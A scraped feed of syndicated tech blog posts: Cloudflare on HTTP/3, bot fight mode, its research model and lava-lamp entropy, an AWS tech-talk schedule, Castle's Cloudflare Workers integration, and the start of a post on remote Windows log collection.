expires: Tue, 17 Sep 2019 12:28:07 GMT
alt-svc: h3-22=":443"; ma=86400
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
server: cloudflare
cf-ray: 517b128df871bfe3-MAN

Using quiche’s http3-client

Finally, we also provide an example HTTP/3 command-line client (as well as a command-line server) built on top of quiche, that you can use to experiment with HTTP/3.

To get it running, first clone quiche’s GitHub repository:

$ git clone --recursive https://github.com/cloudflare/quiche

Then build it. You need a working Rust and Cargo installation for this to work (we recommend using rustup to easily setup a working Rust development environment).

$ cargo build --examples

And finally you can execute an HTTP/3 request:

$ RUST_LOG=info target/debug/examples/http3-client https://blog.cloudflare.com/

What’s next?

In the coming months we’ll be working on improving and optimizing our QUIC and HTTP/3 implementation, and will eventually allow everyone to enable this new feature without having to go through a waiting list. We’ll continue updating our implementation as standards evolve, which may result in breaking changes between draft versions of the standards.

Here are a few new features on our roadmap that we’re particularly excited about:

Connection migration

One important feature that QUIC enables is seamless and transparent migration of connections between different networks (such as your home WiFi network and your carrier’s mobile network as you leave for work in the morning) without requiring a whole new connection to be created.

HTTP/3: the past, the present, and the future

This feature will require some additional changes to our infrastructure, but it’s something we are excited to offer our customers in the future.

Zero Round Trip Time Resumption

Just like TLS 1.3, QUIC supports a mode of operation that allows clients to start sending HTTP requests before the connection handshake has completed. We don’t yet support this feature in our QUIC deployment, but we’ll be working on making it available, just like we already do for our TLS 1.3 support.

HTTP/3: it’s alive!

We are excited to support HTTP/3 and allow our customers to experiment with it while efforts to standardize QUIC and HTTP/3 are still ongoing. We’ll continue working alongside other organizations, including Google and Mozilla, to finalize the QUIC and HTTP/3 standards and encourage broad adoption.

Here’s to a faster, more reliable, more secure web experience for all.

Cleaning up bad bots (and the climate)

Post Syndicated from John Graham-Cumming original https://blog.cloudflare.com/cleaning-up-bad-bots/

Cleaning up bad bots (and the climate)

From the very beginning Cloudflare has been stopping malicious bots from scraping websites, or misusing APIs. Over time we’ve improved our bot detection methods and deployed large machine learning models that are able to distinguish real traffic (be it from humans or apps) from malicious bots. We’ve also built a large catalog of good bots to detect things like helpful indexing by search engines.

But it’s not enough. Malicious bots continue to be a problem on the Internet and we’ve decided to fight back. From today customers have the option of enabling “bot fight mode” in their Cloudflare Dashboard.

Cleaning up bad bots (and the climate)

Once enabled, when we detect a bad bot, we will do three things: (1) we’re going to disincentivize the bot maker economically by tarpitting them, including requiring them to solve a computationally intensive challenge that will require more of their bot’s CPU; (2) for Bandwidth Alliance partners, we’re going to hand the IP of the bot to the partner and get the bot kicked offline; and (3) we’re going to plant trees to make up for the bot’s carbon cost.

Cleaning up bad bots (and the climate)

Malicious bots harm legitimate web publishers and applications, hurt hosting providers by misusing resources, and they doubly hurt the planet through the cost of electricity for servers and cooling for their bots and their victims.

Enough is enough. Our goal is nothing short of making it no longer viable to run a malicious bot on the Internet. And we think, with our scale, we can do exactly that.

How Cloudflare Detects Bots

Cloudflare’s secret sauce (ok, not very secret sauce) is our vast scale.  We currently handle traffic for over 20 million Internet properties ranging from the smallest personal web sites, through backend APIs for popular apps and IoT devices, to some of the best known names on the Internet (including 10% of the Fortune 1000).

This scale gives us a huge advantage in that we see an enormous amount and variety of traffic allowing us to build large machine learning models of Internet behavior. That scale and variety allows us to test new rules and models quickly and easily.

Our bot detection breaks down into four large components:

  • Identification of well known legitimate bots;
  • Hand written rules for simple bots that, however simple, get used day in, day out;
  • Our Bot Activity Detector model that spots the behavior of bots based on past traffic and blocks them; and
  • Our Trusted Client model that spots whether an HTTP User-Agent is what it says it is.

In addition, Gatebot, our DDoS mitigation system, fingerprints DDoS bots and blocks their traffic at the packet level. Beyond Gatebot, customers also have access to our Firewall Rules where they can write granular rules to block very specific attack types.

Another model allows us to determine whether an IP address belongs to a VPN endpoint, a home broadband subscriber, a company using NAT or a hosting or cloud provider. It’s this last group that “Bot Cleanup” targets.

Today, Cloudflare challenges over 3 billion bot requests per day. Some of those bots are about to have a really bad time.

How Cloudflare Fights Bots

The cost of launching a bot attack consists of the expense of CPU time that powers the attack. If our models show that the traffic is coming from a bot, and it’s on a hosting or a cloud provider, we’ll deploy CPU intensive code to make the bot writer expend more CPU and slow them down. By forcing the attacker to use more CPU, we increase their costs during an attack and deter future ones.

This is one of the many so-called “tarpitting” techniques we’re now deploying across our network to change the economics of running a malicious bot. Malicious bot operators be warned: if you target resources behind Cloudflare’s IP space and we’re going to make you spin your wheels.

Every minute we tie malicious bots up is a minute they’re not harming the Internet as a whole. This means we aren’t just protecting our customers but everyone online currently terrorized by malicious bots. The spirit of Cloudflare’s Birthday Week has always been about giving back to the Internet as a whole, and we can think of no better gift than ridding the Internet of malicious bots.

Beyond just wasting bots time we want to also get them shut down. If the infrastructure provider hosting the bot is part of the Bandwidth Alliance, we’ll share the bot’s IP address so they can shutdown the bot completely. The Bandwidth Alliance allows us to reduce transit costs with partners and, with this launch, also helps us work together with them to make the Internet safer for legitimate users.

Generally, everyone we ran Bot Fight Mode by thought it was a great idea. The only objection we heard was that as we start forcing bots to solve CPU intensive challenges in the short term, before they just give up — which we think is inevitable in the long term — we may raise carbon emissions. To combat those emissions we’re committed to estimating the extra CPU utilized by these bots, calculating their carbon cost, and then planting trees to compensate and build a better future.

Planting Trees

Dealing with climate change requires multiple efforts by people and companies. Cloudflare announced earlier this year that we had expanded our purchasing of Renewable Energy Certificates (that previously covered our North American operations) to our entire global network of 194 cities.

To figure out how much tree planting we need to do we need to calculate the cost of the extra CPU used when making a bot work hard. Here’s how that will work.

Using a figure of 450 kg CO2/year  (from https://www.goclimateneutral.org/blog/the-carbon-footprint-of-servers/) for the types of server that a bad bot might use (cloud server using a non-renewable energy source) we get about 8kg CO2/year per CPU core. We are able to measure the time bots spend burning CPU and so we can directly estimate the amount of CO2 emitted by our fight back.

According to One Tree Planted, a single mature tree can absorb about 21kg CO2/year. So, very roughly, each tree can absorb a year’s worth of CO2 from 2.5 CPU cores.

Since trees take time to mature and the scale of the climate change challenge we’re going to pay to overplant trees. For every tree that we calculate we’d need to plant to sequester the CO2 emissions from fighting bots we’re going to donate $25 to One Tree Planted to plant 25 trees.

And, of course, we’ll be handing the IPs of bad bots to our Bandwidth Alliance partners to get the bots shut down and remove their carbon cost completely. In the past, the tech community has largely defeated email spammers and DDoS-for-hire services by making their efforts fruitless, we think this is the right strategy to now defeat malicious bots once and for all.

Who Do Bots Hurt?

Malicious bots can cause significant harm to our customers’ infrastructure and often result in bad experiences for our customers’ users.

For example, a recent customer was being crippled by a credential stuffing attack that not only was attempting to compromise their users’ accounts but was doing so in such significant volume that it was effectively causing a small scale Denial of Service on all aspects of the customer’s website.

The malicious bot was overloading the customer’s conventional threat prevention infrastructure and we rapidly onboarded them as an Under Attack customer. As a part of the onboarding, we identified that the attack could be specifically thwarted using our Bot Management product while not impacting any legitimate user traffic.

Another trend we have seen is the increase of the combination of bots with botnets, particularly in the world of inventory hoarding bots. The motivation and willingness to spend for these bot operators is quite high.

The targets are goods of generally of limited supply and high in demand and in value. Think sneakers, concert tickets, airline seats, and popular short run Broadway musicals. Bot operators who are able to purchase those items at retail can charge massive premiums in aftermarket sales. When the operator identifies a target site, such as an ecommerce retailer, and a specific item, such as a new pair of sneakers going on sale, they can purchase time on the new Residential Proxy as a Service market to gain access to end user machines and (relatively) clean IPs from which to launch their attack.

They then utilize sophisticated techniques and triggers to change characteristics of the machine, network, and software they use to generate the attack through a very wide array of options and combinations, thwarting systems that rely on repetition or known patterns. This type of attack hurts multiple targets as well: the ecommerce site has real frustrated users who can’t purchase the in demand item. The real users who are losing out on inventory to an attacker who is just there to skim off the largest profit possible. And the unwitting users who are part of the botnet have their resources, such as their home broadband connection, used without their consent or knowledge.

The bottom line is that bots hurt companies and their customers.

Summary

Cloudflare has fought malicious bots from the very beginning and over time has deployed more and more sophisticated methods to block them. Using the power of the over 20 million Internet properties we protect and accelerate and our visibility of networks and users around the world we have build machine learning models that sort the bots from the good and block the bad.

But bots continue to be a problem and our new bot fight mode will directly disincentive bot writers from attacking customers. At the same time we don’t want to contribute to climate change and are offsetting the carbon cost of bots by planting trees to absorb carbon and help build a better future (and Internet).

Cleaning up bad bots (and the climate)

Cloudflare’s Approach to Research

Post Syndicated from Nick Sullivan original https://blog.cloudflare.com/cloudflares-approach-to-research/

Cloudflare’s Approach to Research

Cloudflare’s Approach to Research

Cloudflare’s mission is to help build a better Internet. One of the tools used in pursuit of this goal is computer science research. We’ve learned that some of the difficult problems to solve are best approached through research and experimentation to understand the solution before engineering it at scale. This research-focused approach to solving the big problems of the Internet is exemplified by the work of the Cryptography Research team, which leverages research to help build a safer, more secure and more performant Internet. Over the years, the team has worked on more than just cryptography, so we’re taking the model we’ve developed and expanding the scope of the team to include more areas of computer science research. Cryptography Research at Cloudflare is now Cloudflare Research. I am excited to share some of the insights we’ve learned over the years in this blog post.

Cloudflare’s research model

PrincipleDescription
Team structureHybrid approach. We have a program that allows research engineers to be embedded into product and operations teams for temporary assignments. This gives people direct exposure to practical problems.
Problem philosophyImpact-focused. We use our expertise and the expertise of partners in industry and academia to select projects that have the potential to make a big impact, and for which existing solutions are insufficient or not yet popularized.
Promoting solutionsOpen collaboration. Popularizing winning ideas through public outreach, working with industry partners to promote standardization, and implementing ideas at scale to show they’re effective.

The hybrid approach to research

“Super-ambitious goals tend to be unifying and energizing to people; but only if they believe there’s a chance of success.” – Peter Diamandis

Given the scale and reach of Cloudflare, research problems (and opportunities) present themselves all the time. Our approach to research is a practical one. We choose to tackle projects that have the potential to make a big impact, and for which existing solutions are insufficient. This stems from a belief that the interconnected systems that make up the Internet can be changed and improved in a fundamental way. While some research problems are solvable in a few months, some may take years. We don’t shy away from long-term projects, but the Internet moves fast, so it’s important to break down long-term projects into smaller, independently-valuable pieces in order to continually provide value while pursuing a bigger vision.

Successful technological innovation is not purely about technical accomplishments. New creations need the social and political scaffolding to support it while being built, and the momentum and support to gain popularity. We are better able to innovate if grounded in a deep understanding of the current day-to-day. To stay grounded, our research team members spend part of their time solving practical problems that affect Cloudflare and our customers right now.

Cloudflare employs a hybrid research model similar to the model pioneered by Google. Innovation can come from everywhere in a company, so teams are encouraged to find the right balance between research and engineering activities. The research team works with the same tools, systems, and constraints as the rest of the engineering organization.

Research engineers are expected to write production-quality code and contribute to engineering activities. This enables researchers to leverage the rich data provided by Cloudflare’s production environment for experiments. To further break down silos, we have a program that allows research engineers to be embedded into product and operations teams for temporary assignments. This gives people direct exposure to practical problems.

Continuing a successful tradition (our tradition)

“Skate to where the puck is going, not where it has been.” – Wayne Gretzky

The output of the research team is both new knowledge and technology that can lead to innovative products. Research works hand-in-hand with both product and engineering to help drive long-term positive outcomes for both Cloudflare and the Internet at large.

An example of a long-term project that requires both research and engineering is helping the Internet migrate from insecure to secure network protocols. To tackle the problem, we pursued several smaller projects with discrete and measurable outcomes. This included:

and many other smaller projects. Each step along the way contributed something concrete to help make the Internet more secure.

This year’s Crypto Week is a great example of the type of impact an effective hybrid research organization can make. Every day that week, a new announcement was made that helped take research results and realize their practical impact. From the League of Entropy, which is based on fundamental work by researchers at EPFL, to Cloudflare Time Services, which helps address time security issues raised in papers by former Cloudflare intern Aanchal Malhotra, to our own (currently running) post-quantum experiment with Google Chrome, engineers at Cloudflare combined research with building large-scale production systems to help solve some unsolved problems on the Internet.

Open collaboration, open standards, and open source

“We reject kings, presidents and voting. We believe in rough consensus and running code.” – Dave Clark

Effective research requires:

  • Choosing interesting problems to solve
  • Popularizing the ideas discovered while studying the solution space
  • Implementing the ideas at scale to show they’re effective

Cloudflare’s massive popularity puts us in a very privileged position. We can research, implement and deploy experiments at a scale that simply can’t be done by most organizations. This makes Cloudflare an attractive research partner for universities and other research institutions who have domain knowledge but not data. We rely on our own expertise along with that of peers in both academia and industry to decide which problems to tackle in order to achieve common goals and make new scientific progress. Our middlebox detection project, proposed by researchers at the University of Michigan, is an example of such a problem.

We’re not purists who are only interested in pursuing our own ideas. Some interesting problems have already been solved, but the solution isn’t widely known or implemented. In this situation, we contribute our efforts to help elevate the best ideas and make them available to the public in an accessible way. Our early work popularizing elliptic curves on the Internet is such an example.

Popularizing an idea and implementing the idea at scale are two different things. Along with popularizing winning ideas, we want to ensure these ideas stick and provide benefits to Internet users. To promote the widespread deployment of useful ideas, we work on standards and deploy newly emerging standards early on. Doing so helps the industry easily adopt innovations and supports interoperability. For example, the work done for Crypto Week 2019 has helped the development of international technical standards. Aspects of the League of Entropy are now being standardized at the CFRG, Roughtime is now being considered for adoption as an IETF standard, and we are presenting our post-quantum results as part of NIST’s post-quantum cryptography standardization effort.

Open source software is another key aspect of scaling the implementation of an idea. We open source associated code whenever possible. The research team collaborates with the wider research world as well as internally with other teams at Cloudflare.

Focus areas going forward

Doing research, sharing it in an accessible way, working with top experts to validate it, and working on standardization has several benefits. It provides an opportunity to educate the public, further scientific understanding, and improve the state of the art; but it’s also a great way to attract candidates. Great engineers want to work on interesting projects and great researchers want to see their work have an impact. This hybrid research approach is attractive to both types of candidates.

Computer science is a vast arena, so the areas we’re currently focusing on are:

  • Security and privacy
  • Cryptography
  • Internet measurement
  • Low-level networking and operating systems
  • Emerging networking paradigms

Here are some highlights of publications we’ve co-authored over the last few years in these areas. We’ll be building on this tradition going forward.

And by the way, we’re hiring!

Product Management
Help the research team explore the future of peer-to-peer systems by building and managing projects like the Distributed Web Gateway.

Engineering
Engineering Manager (San Francisco, London)
Systems Engineer – Cryptography Research (San Francisco)
Cryptography Research Engineer Internship (San Francisco, London)

If none of these fit you perfectly, but you still want to reach out, send us an email at: [email protected].

How Cloudflare and Wall Street Are Helping Encrypt the Internet Today

Post Syndicated from Nick Sullivan original https://blog.cloudflare.com/how-cloudflare-and-wall-street-are-helping-encrypt-the-internet-today/

How Cloudflare and Wall Street Are Helping Encrypt the Internet Today

How Cloudflare and Wall Street Are Helping Encrypt the Internet Today

Today has been a big day for Cloudflare, as we became a public company on the New York Stock Exchange (NYSE: NET). To mark the occasion, we decided to bring our favorite entropy machines to the floor of the NYSE. Footage of these lava lamps is being used as an additional seed to our entropy-generation system LavaRand — bolstering Internet encryption for over 20 million Internet properties worldwide.

(This is mostly for fun. But when’s the last time you saw a lava lamp on the trading floor of the New York Stock Exchange?)

How Cloudflare and Wall Street Are Helping Encrypt the Internet Today

A little context: generating truly random numbers using computers is impossible, because code is inherently deterministic (i.e. predictable). To compensate for this, engineers draw from pools of randomness created by entropy generators, which is a fancy term for “things that are truly unpredictable”.

It turns out that lava lamps are fantastic sources of entropy, as was first shown by Silicon Graphics in the 1990s. It’s a torch we’ve been proud to carry forward: today, Cloudflare uses lava lamps to generate entropy that helps make millions of Internet properties more secure.

How Cloudflare and Wall Street Are Helping Encrypt the Internet Today

Housed in our San Francisco headquarters is a wall filled with dozens of lava lamps, undulating with mesmerizing randomness. We capture these lava lamps on video via a camera mounted across the room, and feed the resulting footage into an algorithm — called LavaRand — that amplifies the pure randomness of these lava lamps to dizzying extremes (computers can’t create seeds of pure randomness, but they can massively amplify them).

Shortly before we rang the opening bell this morning, we recorded footage of our lava lamps in operation on the trading room floor of the New York Stock Exchange, and we’re ingesting the footage into our LavaRand system. The resulting entropy is mixed with the myriad additional sources of entropy that we leverage every day, creating a cryptographically-secure source of randomness — fortified by Wall Street.

How Cloudflare and Wall Street Are Helping Encrypt the Internet Today

We recently took our enthusiasm for randomness a step further by facilitating the League of Entropy, a consortium of global organizations and individual contributors, generating verifiable randomness via a globally distributed network. As one of the founding members of the League, LavaRand (pictured above) plays a key role in empowering developers worldwide with a pool of randomness with extreme entropy and high reliability.

And today, she’s enjoying the view from the podium!


One caveat: the lava lamps we run in our San Francisco headquarters are recorded in real-time, 24/7, giving us an ongoing stream of entropy. For reasons that are understandable, the NYSE doesn’t allow for live video feeds from the exchange floor while it is in operation. But this morning they did let us record footage of the lava lamps operating shortly before the opening bell. The video was recorded and we’re ingesting it into our LavaRand system (alongside many other entropy generators, including the lava lamps back in San Francisco).

Learn about AWS Services & Solutions – September AWS Online Tech Talks

Post Syndicated from Jenny Hang original https://aws.amazon.com/blogs/aws/learn-about-aws-services-solutions-september-aws-online-tech-talks/

Learn about AWS Services & Solutions – September AWS Online Tech Talks

AWS Tech Talks

Join us this September to learn about AWS services and solutions. The AWS Online Tech Talks are live, online presentations that cover a broad range of topics at varying technical levels. These tech talks, led by AWS solutions architects and engineers, feature technical deep dives, live demonstrations, customer examples, and Q&A with AWS experts. Register Now!

Note – All sessions are free and in Pacific Time.

Tech talks this month:

 

Compute:

September 23, 2019 | 11:00 AM – 12:00 PM PTBuild Your Hybrid Cloud Architecture with AWS – Learn about the extensive range of services AWS offers to help you build a hybrid cloud architecture best suited for your use case.

September 26, 2019 | 1:00 PM – 2:00 PM PTSelf-Hosted WordPress: It’s Easier Than You Think – Learn how you can easily build a fault-tolerant WordPress site using Amazon Lightsail.

October 3, 2019 | 11:00 AM – 12:00 PM PTLower Costs by Right Sizing Your Instance with Amazon EC2 T3 General Purpose Burstable Instances – Get an overview of T3 instances, understand what workloads are ideal for them, and understand how the T3 credit system works so that you can lower your EC2 instance costs today.

 

Containers:

September 26, 2019 | 11:00 AM – 12:00 PM PTDevelop a Web App Using Amazon ECS and AWS Cloud Development Kit (CDK) – Learn how to build your first app using CDK and AWS container services.

 

Data Lakes & Analytics:

September 26, 2019 | 9:00 AM – 10:00 AM PTBest Practices for Provisioning Amazon MSK Clusters and Using Popular Apache Kafka-Compatible Tooling – Learn best practices on running Apache Kafka production workloads at a lower cost on Amazon MSK.

 

Databases:

September 25, 2019 | 1:00 PM – 2:00 PM PTWhat’s New in Amazon DocumentDB (with MongoDB compatibility) – Learn what’s new in Amazon DocumentDB, a fully managed MongoDB compatible database service designed from the ground up to be fast, scalable, and highly available.

October 3, 2019 | 9:00 AM – 10:00 AM PTBest Practices for Enterprise-Class Security, High-Availability, and Scalability with Amazon ElastiCache – Learn about new enterprise-friendly Amazon ElastiCache enhancements like customer managed key and online scaling up or down to make your critical workloads more secure, scalable and available.

 

DevOps:

October 1, 2019 | 9:00 AM – 10:00 AM PT – CI/CD for Containers: A Way Forward for Your DevOps Pipeline – Learn how to build CI/CD pipelines using AWS services to get the most out of the agility afforded by containers.

 

Enterprise & Hybrid:

September 24, 2019 | 1:00 PM – 2:30 PM PT Virtual Workshop: How to Monitor and Manage Your AWS Costs – Learn how to visualize and manage your AWS cost and usage in this virtual hands-on workshop.

October 2, 2019 | 1:00 PM – 2:00 PM PT – Accelerate Cloud Adoption and Reduce Operational Risk with AWS Managed Services – Learn how AMS accelerates your migration to AWS, reduces your operating costs, improves security and compliance, and enables you to focus on your differentiating business priorities.

 

IoT:

September 25, 2019 | 9:00 AM – 10:00 AM PTComplex Monitoring for Industrial with AWS IoT Data Services – Learn how to solve your complex event monitoring challenges with AWS IoT Data Services.

 

Machine Learning:

September 23, 2019 | 9:00 AM – 10:00 AM PTTraining Machine Learning Models Faster – Learn how to train machine learning models quickly and with a single click using Amazon SageMaker.

September 30, 2019 | 11:00 AM – 12:00 PM PTUsing Containers for Deep Learning Workflows – Learn how containers can help address challenges in deploying deep learning environments.

October 3, 2019 | 1:00 PM – 2:30 PM PTVirtual Workshop: Getting Hands-On with Machine Learning and Ready to Race in the AWS DeepRacer League – Join DeClercq Wentzel, Senior Product Manager for AWS DeepRacer, for a presentation on the basics of machine learning and how to build a reinforcement learning model that you can use to join the AWS DeepRacer League.

 

AWS Marketplace:

September 30, 2019 | 9:00 AM – 10:00 AM PTAdvancing Software Procurement in a Containerized World – Learn how to deploy applications faster with third-party container products.

 

Migration:

September 24, 2019 | 11:00 AM – 12:00 PM PTApplication Migrations Using AWS Server Migration Service (SMS) – Learn how to use AWS Server Migration Service (SMS) for automating application migration and scheduling continuous replication, from your on-premises data centers or Microsoft Azure to AWS.

 

Networking & Content Delivery:

September 25, 2019 | 11:00 AM – 12:00 PM PTBuilding Highly Available and Performant Applications using AWS Global Accelerator – Learn how to build highly available and performant architectures for your applications with AWS Global Accelerator, now with source IP preservation.

September 30, 2019 | 1:00 PM – 2:00 PM PTAWS Office Hours: Amazon CloudFront – Just getting started with Amazon CloudFront and [email protected]? Get answers directly from our experts during AWS Office Hours.

 

Robotics:

October 1, 2019 | 11:00 AM – 12:00 PM PTRobots and STEM: AWS RoboMaker and AWS Educate Unite! – Come join members of the AWS RoboMaker and AWS Educate teams as we provide an overview of our education initiatives and walk you through the newly launched RoboMaker Badge.

 

Security, Identity & Compliance:

October 1, 2019 | 1:00 PM – 2:00 PM PTDeep Dive on Running Active Directory on AWS – Learn how to deploy Active Directory on AWS and start migrating your windows workloads.

 

Serverless:

October 2, 2019 | 9:00 AM – 10:00 AM PTDeep Dive on Amazon EventBridge – Learn how to optimize event-driven applications, and use rules and policies to route, transform, and control access to these events that react to data from SaaS apps.

 

Storage:

September 24, 2019 | 9:00 AM – 10:00 AM PTOptimize Your Amazon S3 Data Lake with S3 Storage Classes and Management Tools – Learn how to use the Amazon S3 Storage Classes and management tools to better manage your data lake at scale and to optimize storage costs and resources.

October 2, 2019 | 11:00 AM – 12:00 PM PTThe Great Migration to Cloud Storage: Choosing the Right Storage Solution for Your Workload – Learn more about AWS storage services and identify which service is the right fit for your business.

 

 

How Castle is Building Codeless Customer Account Protection

Post Syndicated from Guest Author original https://blog.cloudflare.com/castle-building-codeless-customer-account-protection/

How Castle is Building Codeless Customer Account Protection

How Castle is Building Codeless Customer Account Protection

This is a guest post by Johanna Larsson, of Castle, who designed and built the Castle Cloudflare app and the supporting infrastructure.

Strong security should be easy.

Asking your consumers again and again to take responsibility for their security through robust passwords and other security measures doesn’t work. The responsibility of security needs to shift from end users to the companies who serve them.

Castle is leading the way for companies to better protect their online accounts with millions of consumers being protected every day. Uniquely, Castle extends threat prevention and protection for both pre and post login ensuring you can keep friction low but security high. With realtime responses and automated workflows for account recovery, overwhelmed security teams are given a hand. However, when you’re that busy, sometimes deploying new solutions takes more time than you have. Reducing time to deployment was a priority so Castle turned to Cloudflare Workers.

User security and friction

When security is no longer optional and threats are not black or white, security teams are left with trying to determine how to allow end-user access and transaction completions when there are hints of risk, or when not all of the information is available. Keeping friction low is important to customer experience. Castle helps organizations be more dynamic and proactive by making continuous security decisions based on realtime risk and trust.

Some of the challenges with traditional solutions is that they are often just focused on protecting the app or they are only focused on point of access, protecting against bot access for example. Tools specifically designed for securing user accounts however are fundamentally focused on protecting the accounts of the end-users, whether they are being targeting by human or bots. Being able to understand end-user behaviors and their devices both pre and post login is therefore critical in being able to truly protect each users. The key to protecting users is being able to decipher between normal and anomalous activity on an individual account and device basis. You also need a playbook to respond to anomalies and attacks with dedicated flows, that allows your end users to interact directly and provide feedback around security events.

By understanding the end user and their good behaviors, devices, and transactions, it is possible to automatically respond to account threats in real-time based on risk level and policy. This approach not only reduces end-user friction but enables security teams to feel more confident that they won’t ever be blocking a legitimate login or transaction.

Castle processes tens of millions of events every day through its APIs, including contextual information like headers, IP, and device types. The more information that can be associated with a request the better. This allows us to better recognize abnormalities and protect the end user. Collection of this information is done in two ways. One is done on the web application’s backend side through our SDKs and the other is done on the client side using our mobile SDK or browser script. Our experience shows that any integration of a security service based on user behavior and anomaly detection can involve many different parties across an organization, and it affects multiple layers of the tech stack. On top of the security related roles, it’s not unusual to also have to coordinate between backend, devops, and frontend teams. The information related to an end user session is often spread widely over a code base.

The cost of security

One of the biggest challenges in implementing a user-facing security and risk management solution is the variety of people and teams it needs attention from, each with competing priorities. Security teams are often understaffed and overwhelmed making it difficult to take on new projects. At the same time, it consumes time from product and engineering personnel on the application side, who are responsible for UX flows and performing continuous authentication post-login.

We’ve been experimenting with approaches where we can extract that complexity from your application code base, while also reducing the effort of integrating. At Castle, we believe that strong security should be easy.

How Castle is Building Codeless Customer Account Protection

With Cloudflare we found a service that enables us to create a more friendly, simple, and in the end, safe integration process by placing the security layer directly between the end user and your application. Security-related logic shouldn’t pollute your app, but should reside in a separate service, or shield, that covers your app. When the two environments are kept separate, this reduces the time and cost of implementing complex systems making integration and maintenance less stressful and much easier.

Our integration with Cloudflare aims to solve this implementation challenge, delivering end-to-end account protection for your users, both pre and post login, with the click of a button.

The codeless integration

In our quest for a purely codeless integration, key features are required. When every customer application is different, this means every integration is different. We want to solve this problem for you once and for all. To do this, we needed to move the security work away from the implementation details so that we could instead focus on describing the key interactions with the end user, like logins or bank transactions. We also wanted to empower key decision makers to recognize and handle crucial interactions in their systems. Creating a single solution that could be customized to fit each specific use case was a priority.

Building on top of Cloudflare’s platform, we made use of three unique and powerful products: Workers, Apps for Workers, and Workers KV.

Thanks to Workers we have full access to the interactions between the end user and your application. With their impressive performance, we can confidently run inline of website requests without creating noticeable latency. We will never slow down your site. And in order to achieve the flexibility required to match your specific use case, we created an internal configuration format that fully describes the interactions of devices and servers across HTTP, including web and mobile app traffic. It is in this Worker where we’ve implemented an advanced routing engine to match and collect information about requests and responses to events, directly from the edge. It also fully handles injecting the Castle browser script — one less thing to worry about.

All of this logic is kept separate from your application code, and through the Cloudflare App Store we are able to distribute this Worker, giving you control over when and where it is enabled, as well as what configurations are used. There’s no need to copy/paste code or manage your own Workers.

In order to achieve the required speed while running in distributed edge locations, we needed a high performing low latency datastore, and we found one in the Cloudflare Workers KV Store. Cloudflare Apps are not able to access the KV Store directly, but we’ve solved this by exposing it through a separate Worker that the Castle App connects to. Because traffic between Workers never leaves the Cloudflare network, this is both secure and fast enough to match your requirements. The KV Store allows us to maintain end user sessions across the world, and also gives us a place to store and update the configurations and sessions that drive the Castle App.

In combining these products we have a complete and codeless integration that is fully configurable and that won’t slow you down.

How does it work?

The data flow is straightforward. After installing the Castle App, Cloudflare will route your traffic through the Castle App, which uses the Castle Data Store and our API to intelligently protect your end users. The impact to traffic latency is minimal because most work is done in the background, not blocking the requests. Let’s dig deeper into each technical feature:

Script injection

One of the tools we use to verify user identity is a browser script: Castle.js. It is responsible for gathering device information and UI interaction behavior, and although it is not required for our service to function, it helps improve our verdicts. This means it’s important that it is properly added to every page in your web application. The Castle App, running between the end user and your application, is able to unobtrusively add the script to each page as it is served. In order for the script to also track page interactions it needs to be able to connect them to your users, which is done through a call to our script and also works out of the box with the Cloudflare interaction. This removes 100% of the integration work from your frontend teams.

Collect contextual information

The second half of the information that forms the basis of our security analysis is the information related to the request itself, such as IP and headers, as well as timestamps. Gathering this information may seem straightforward, but our experience shows some recurring problems in traditional integrations. IP-addresses are easily lost behind reverse proxies, as they need to be maintained as separate headers, like `X-Forwarded-For`, and the internal format of headers differs from platform to platform. Headers in general might get cut off based on whitelisting. The Castle App sees the original request as it comes in, with no outside influence or platform differences, enabling it to reliably create the context of the request. This saves your infrastructure and backend engineers from huge efforts debugging edge cases.

Advanced routing engine

Finally, in order to reliably recognize important events, like login attempts, we’ve built a fully configurable routing engine. This is fast enough to run inline of your web application, and supports near real-time configuration updates. It is powerful enough to translate requests to actual events in your system, like logins, purchases, profile updates or transactions. Using information from the request, it is then able to send this information to Castle, where you are able to analyze, verify and take action on suspicious activity. What’s even better, is that at any point in the future if you want to Castle protect a new critical user event – such as a withdrawal or transfer event – all it takes is adding a record to the configuration file. You never have to touch application code in order to expand your Castle integration across sensitive events.

We’ve put together an example TypeScript snippet that naively implements the flow and features we’ve discussed. The details are glossed over so that we can focus on the functionality.

addEventListener(event => event.respondWith(handleEvent(event)));

const respondWith = async (event: CloudflareEvent) => {
  // You configure the application with your Castle API key
  const { apiKey } = INSTALL_OPTIONS;
  const { request } = event;

  // Configuration is fetched from the KV Store
  const configuration = await getConfiguration(apiKey);

  // The session is also retrieved from the KV Store
  const session = await getUserSession(request);

  // Pass the request through and get the response
  let response = await fetch(request);

  // Using the configuration we can recognize events by running
  // the request+response and configuration through our matching engine
  const securityEvent = getMatchingEvent(request, response, configuration);

  if (securityEvent) {
    // With direct access to the raw request, we can confidently build the context
    // including a device ID generated by the browser script, IP, and headers
    const requestContext = getRequestContext(request);

    // Collecting the relevant information, the data is passed to the Castle API
    event.waitUntil(sendToCastle(securityEvent, session, requestContext));
  }

  // Because we have access to the response HTML page we can safely inject the browser
  // script. If the response is not an HTML page it is passed through untouched.
  response = injectScript(response, session);

  return response;
};

We hope we have inspired you and demonstrated how Workers can provide speed and flexibility when implementing end to end account protection for your end users with Castle. If you are curious about our service, learn more here.

Remote Log Collection on Windows

Post Syndicated from Bozho original https://techblog.bozho.net/remote-log-collection-on-windows/

Every organization needs to collect logs from multiple sources in order to put them in either a log collector or SIEM (or a dedicated audit trail solution). And there are two options for that – using an agent and agentless.

Using an agent is easy – you install a piece of software on each machine that generates logs and it forwards them wherever needed. This is however not preferred by many organizations as it complicates things – upgrading to new versions, keeping track of dozens of configurations, and potentially impacting performance of the target machines.

So some organizations prefer to collect logs remotely, or use standard tooling, already present on the target machine. For Linux that’s typically syslog, where forwarding is configured. Logs can also be read remotely via SCP/SSH.

However, on Windows things are less straightforward. You need to access the Windows Event Log facility remotely, but there is barely a single place that describes all the required steps. This blogpost comes close, but I’d like to provide the full steps, as there are many, many things that one may miss. It is a best practice to use a non-admin, service account for that and you have to give multiple permissions to allow reading the event logs remotely.

There are also multiple ways to read the logs remotely:

  • Through the Event Viewer UI – it’s the simplest to get right, as only one domain group is required for access
  • Through Win32 native API calls (and DCOM) – i.e. EvtOpenSession and the related methods
  • Through PowerShell Get-WinEvent (Get-EventLog is a legacy cmdlet that doesn’t support remoting)
  • Through WMI directly (e.g. this or this. To be honest, I don’t know whether the native calls and the powershell commands don’t use WMI and/or CIM underneath as well – probably.

So, in order to get these options running, the following configurations have to be done:

  1. Allow the necessary network connections to the target machines (through network rules and firewall rules, if applicable)
  2. Go to Windows Firewall -> Inbound rules and enable the rules regarding “Remote log management”
